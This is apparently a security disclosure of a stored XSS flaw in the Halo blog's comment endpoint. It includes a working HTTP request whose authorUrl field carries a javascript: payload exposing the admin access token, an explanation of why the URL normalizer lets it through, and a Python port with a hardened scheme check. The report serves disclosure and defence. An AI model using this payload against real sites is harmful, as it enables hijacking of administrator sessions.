Stored XSS vulnerability in post comments
Created by: thiscodecc
Submitted through the comment form.
Screenshots:
After the request succeeds, open the comment list in the admin backend and click jack01.
The XSS fires.
An attacker can read localStorage; the credential that authenticates privileged access is stored under the key halo__Access-Token.
Payload
POST /api/content/posts/comments HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 147
Connection: close

{"author":"jack02","authorUrl":"javascript:alert(localStorage.getItem('halo__Access-Token'));//://","email":"1@2.com","content":"hello","postId":1}
The root cause is incorrect filtering of the authorUrl parameter in BaseCommentServiceImpl:
    if (StringUtils.isNotEmpty(comment.getAuthorUrl())) {
        // The only sanitisation applied to the author URL before it is stored
        comment.setAuthorUrl(URLUtil.normalize(comment.getAuthorUrl()));
    }

The URLUtil.normalize implementation:

    public static String normalize(String url, boolean isEncodeBody) {
        if (StrUtil.isBlank(url)) {
            return url;
        }
        // Split on the first "://": everything before it is treated as the scheme
        // prefix and kept verbatim, so the scheme itself is never validated
        final int sepIndex = url.indexOf("://");
        String pre;
        String body;
        if (sepIndex > 0) {
            pre = StrUtil.subPre(url, sepIndex + 3);
            body = StrUtil.subSuf(url, sepIndex + 3);
        } else {
            // No "://" present: assume http, so a bare "javascript:..." would be
            // prefixed with "http://"; the payload appends "//://" to avoid this branch
            pre = "http://";
            body = url;
        }
        // Cut off the query string before cleaning up the path
        final int paramsSepIndex = StrUtil.indexOf(body, '?');
        String params = null;
        if (paramsSepIndex > 0) {
            params = StrUtil.subSuf(body, paramsSepIndex);
            body = StrUtil.subPre(body, paramsSepIndex);
        }
        // Strip leading slashes, turn backslashes into slashes, collapse repeated slashes
        body = body.replaceAll("^[\\/]+", StrUtil.EMPTY);
        body = body.replace("\\", "/").replaceAll("//+", "/");
        if (isEncodeBody) {
            body = encode(body);
        }
        return pre + body + StrUtil.nullToEmpty(params);
    }
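To make the failure concrete, here is an added example (not Halo's or the URL utility's own code): a Python port of the normalize() logic above, run on the reported payload, next to a hardened check that allow-lists the http and https schemes. The function names hutool_normalize and safe_author_url and the sample inputs are constructed for this illustration; the isEncodeBody branch is skipped because it does not affect the scheme.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

def hutool_normalize(url: str) -> str:
    """Port of the normalize() logic shown above (encode branch omitted).
    It only splits on '://' and never checks what the scheme actually is."""
    if not url or url.isspace():
        return url
    sep = url.find("://")
    if sep > 0:
        pre, body = url[:sep + 3], url[sep + 3:]   # text before '://' kept verbatim
    else:
        pre, body = "http://", url                # no '://' at all: http:// prepended
    params = None
    q = body.find("?")
    if q > 0:
        params, body = body[q:], body[:q]
    body = re.sub(r"^/+", "", body)
    body = re.sub(r"//+", "/", body.replace("\\", "/"))
    return pre + body + (params or "")

# Constructed inputs: the reported payload and a naive variant without the "//://" suffix.
PAYLOAD = "javascript:alert(localStorage.getItem('halo__Access-Token'));//://"
NAIVE = "javascript:alert(1)"

ALLOWED_SCHEMES = {"http", "https"}
SCHEME_RE = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")

def safe_author_url(url: str) -> Optional[str]:
    """Hardened replacement (constructed here, not Halo's fix): allow-list the
    scheme on the raw input, normalize, then re-check the parsed result."""
    # Browsers ignore ASCII tab/newline inside a scheme, so drop C0 controls first.
    url = re.sub(r"[\x00-\x1f\x7f]", "", url).strip()
    m = SCHEME_RE.match(url)
    if m and m.group(1).lower() not in ALLOWED_SCHEMES:
        return None            # javascript:, data:, vbscript:, ... rejected up front
    normalized = hutool_normalize(url)
    parts = urlsplit(normalized)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None            # anything that is not an http(s) URL with a host
    return normalized
```

Running hutool_normalize(PAYLOAD) returns the payload unchanged (the trailing "//://" makes sepIndex > 0, so the whole javascript: string becomes the "prefix"), while safe_author_url rejects it before normalization ever runs.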
Ask the author to fix this vulnerability. Thanks.